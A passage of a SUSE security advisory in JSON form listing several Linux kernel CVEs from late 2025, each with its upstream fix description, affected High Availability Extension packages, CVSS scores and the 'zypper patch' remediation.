"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68337",
"url": "https://www.suse.com/security/cve/CVE-2025-68337"
},
{
"category": "external",
"summary": "SUSE Bug 1255482 for CVE-2025-68337",
"url": "https://bugzilla.suse.com/1255482"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68337"
},
{
"cve": "CVE-2025-68341",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68341"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nveth: reduce XDP no_direct return section to fix race\n\nAs explain in commit fa349e396e48 (\"veth: Fix race with AF_XDP exposing\nold or uninitialized descriptors\") for veth there is a chance after\nnapi_complete_done() that another CPU can manage start another NAPI\ninstance running veth_pool(). For NAPI this is correctly handled as the\nnapi_schedule_prep() check will prevent multiple instances from getting\nscheduled, but for the remaining code in veth_pool() this can run\nconcurrent with the newly started NAPI instance.\n\nThe problem/race is that xdp_clear_return_frame_no_direct() isn\u0027t\ndesigned to be nested.\n\nPrior to commit 401cb7dae813 (\"net: Reference bpf_redirect_info via\ntask_struct on PREEMPT_RT.\") the temporary BPF net context\nbpf_redirect_info was stored per CPU, where this wasn\u0027t an issue. Since\nthis commit the BPF context is stored in \u0027current\u0027 task_struct. When\nrunning veth in threaded-NAPI mode, then the kthread becomes the storage\narea. Now a race exists between two concurrent veth_pool() function calls\none exiting NAPI and one running new NAPI, both using the same BPF net\ncontext.\n\nRace is when another CPU gets within the xdp_set_return_frame_no_direct()\nsection before exiting veth_pool() calls the clear-function\nxdp_clear_return_frame_no_direct().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68341",
"url": "https://www.suse.com/security/cve/CVE-2025-68341"
},
{
"category": "external",
"summary": "SUSE Bug 1255506 for CVE-2025-68341",
"url": "https://bugzilla.suse.com/1255506"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68341"
},
{
"cve": "CVE-2025-68348",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68348"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblock: fix memory leak in __blkdev_issue_zero_pages\n\nMove the fatal signal check before bio_alloc() to prevent a memory\nleak when BLKDEV_ZERO_KILLABLE is set and a fatal signal is pending.\n\nPreviously, the bio was allocated before checking for a fatal signal.\nIf a signal was pending, the code would break out of the loop without\nfreeing or chaining the just-allocated bio, causing a memory leak.\n\nThis matches the pattern already used in __blkdev_issue_write_zeroes()\nwhere the signal check precedes the allocation.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68348",
"url": "https://www.suse.com/security/cve/CVE-2025-68348"
},
{
"category": "external",
"summary": "SUSE Bug 1255694 for CVE-2025-68348",
"url": "https://bugzilla.suse.com/1255694"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68348"
},
{
"cve": "CVE-2025-68349",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68349"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFSv4/pNFS: Clear NFS_INO_LAYOUTCOMMIT in pnfs_mark_layout_stateid_invalid\n\nFixes a crash when layout is null during this call stack:\n\nwrite_inode\n -\u003e nfs4_write_inode\n -\u003e pnfs_layoutcommit_inode\n\npnfs_set_layoutcommit relies on the lseg refcount to keep the layout\naround. Need to clear NFS_INO_LAYOUTCOMMIT otherwise we might attempt\nto reference a null layout.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68349",
"url": "https://www.suse.com/security/cve/CVE-2025-68349"
},
{
"category": "external",
"summary": "SUSE Bug 1255544 for CVE-2025-68349",
"url": "https://bugzilla.suse.com/1255544"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68349"
},
{
"cve": "CVE-2025-68356",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68356"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ngfs2: Prevent recursive memory reclaim\n\nFunction new_inode() returns a new inode with inode-\u003ei_mapping-\u003egfp_mask\nset to GFP_HIGHUSER_MOVABLE. This value includes the __GFP_FS flag, so\nallocations in that address space can recurse into filesystem memory\nreclaim. We don\u0027t want that to happen because it can consume a\nsignificant amount of stack memory.\n\nWorse than that is that it can also deadlock: for example, in several\nplaces, gfs2_unstuff_dinode() is called inside filesystem transactions.\nThis calls filemap_grab_folio(), which can allocate a new folio, which\ncan trigger memory reclaim. If memory reclaim recurses into the\nfilesystem and starts another transaction, a deadlock will ensue.\n\nTo fix these kinds of problems, prevent memory reclaim from recursing\ninto filesystem code by making sure that the gfp_mask of inode address\nspaces doesn\u0027t include __GFP_FS.\n\nThe \"meta\" and resource group address spaces were already using GFP_NOFS\nas their gfp_mask (which doesn\u0027t include __GFP_FS). The default value\nof GFP_HIGHUSER_MOVABLE is less restrictive than GFP_NOFS, though. To\navoid being overly limiting, use the default value and only knock off\nthe __GFP_FS flag. I\u0027m not sure if this will actually make a\ndifference, but it also shouldn\u0027t hurt.\n\nThis patch is loosely based on commit ad22c7a043c2 (\"xfs: prevent stack\noverflows from page cache allocation\").\n\nFixes xfstest generic/273.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68356",
"url": "https://www.suse.com/security/cve/CVE-2025-68356"
},
{
"category": "external",
"summary": "SUSE Bug 1255593 for CVE-2025-68356",
"url": "https://bugzilla.suse.com/1255593"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68356"
},
{
"cve": "CVE-2025-68359",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68359"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix double free of qgroup record after failure to add delayed ref head\n\nIn the previous code it was possible to incur into a double kfree()\nscenario when calling add_delayed_ref_head(). This could happen if the\nrecord was reported to already exist in the\nbtrfs_qgroup_trace_extent_nolock() call, but then there was an error\nlater on add_delayed_ref_head(). In this case, since\nadd_delayed_ref_head() returned an error, the caller went to free the\nrecord. Since add_delayed_ref_head() couldn\u0027t set this kfree\u0027d pointer\nto NULL, then kfree() would have acted on a non-NULL \u0027record\u0027 object\nwhich was pointing to memory already freed by the callee.\n\nThe problem comes from the fact that the responsibility to kfree the\nobject is on both the caller and the callee at the same time. Hence, the\nfix for this is to shift the ownership of the \u0027qrecord\u0027 object out of\nthe add_delayed_ref_head(). That is, we will never attempt to kfree()\nthe given object inside of this function, and will expect the caller to\nact on the \u0027qrecord\u0027 object on its own. The only exception where the\n\u0027qrecord\u0027 object cannot be kfree\u0027d is if it was inserted into the\ntracing logic, for which we already have the \u0027qrecord_inserted_ret\u0027\nboolean to account for this. Hence, the caller has to kfree the object\nonly if add_delayed_ref_head() reports not to have inserted it on the\ntracing logic.\n\nAs a side-effect of the above, we must guarantee that\n\u0027qrecord_inserted_ret\u0027 is properly initialized at the start of the\nfunction, not at the end, and then set when an actual insert\nhappens. This way we avoid \u0027qrecord_inserted_ret\u0027 having an invalid\nvalue on an early exit.\n\nThe documentation from the add_delayed_ref_head() has also been updated\nto reflect on the exact ownership of the \u0027qrecord\u0027 object.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68359",
"url": "https://www.suse.com/security/cve/CVE-2025-68359"
},
{
"category": "external",
"summary": "SUSE Bug 1255542 for CVE-2025-68359",
"url": "https://bugzilla.suse.com/1255542"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68359"
},
{
"cve": "CVE-2025-68360",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68360"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mt76: wed: use proper wed reference in mt76 wed driver callabacks\n\nMT7996 driver can use both wed and wed_hif2 devices to offload traffic\nfrom/to the wireless NIC. In the current codebase we assume to always\nuse the primary wed device in wed callbacks resulting in the following\ncrash if the hw runs wed_hif2 (e.g. 6GHz link).\n\n[ 297.455876] Unable to handle kernel read from unreadable memory at virtual address 000000000000080a\n[ 297.464928] Mem abort info:\n[ 297.467722] ESR = 0x0000000096000005\n[ 297.471461] EC = 0x25: DABT (current EL), IL = 32 bits\n[ 297.476766] SET = 0, FnV = 0\n[ 297.479809] EA = 0, S1PTW = 0\n[ 297.482940] FSC = 0x05: level 1 translation fault\n[ 297.487809] Data abort info:\n[ 297.490679] ISV = 0, ISS = 0x00000005, ISS2 = 0x00000000\n[ 297.496156] CM = 0, WnR = 0, TnD = 0, TagAccess = 0\n[ 297.501196] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0\n[ 297.506500] user pgtable: 4k pages, 39-bit VAs, pgdp=0000000107480000\n[ 297.512927] [000000000000080a] pgd=08000001097fb003, p4d=08000001097fb003, pud=08000001097fb003, 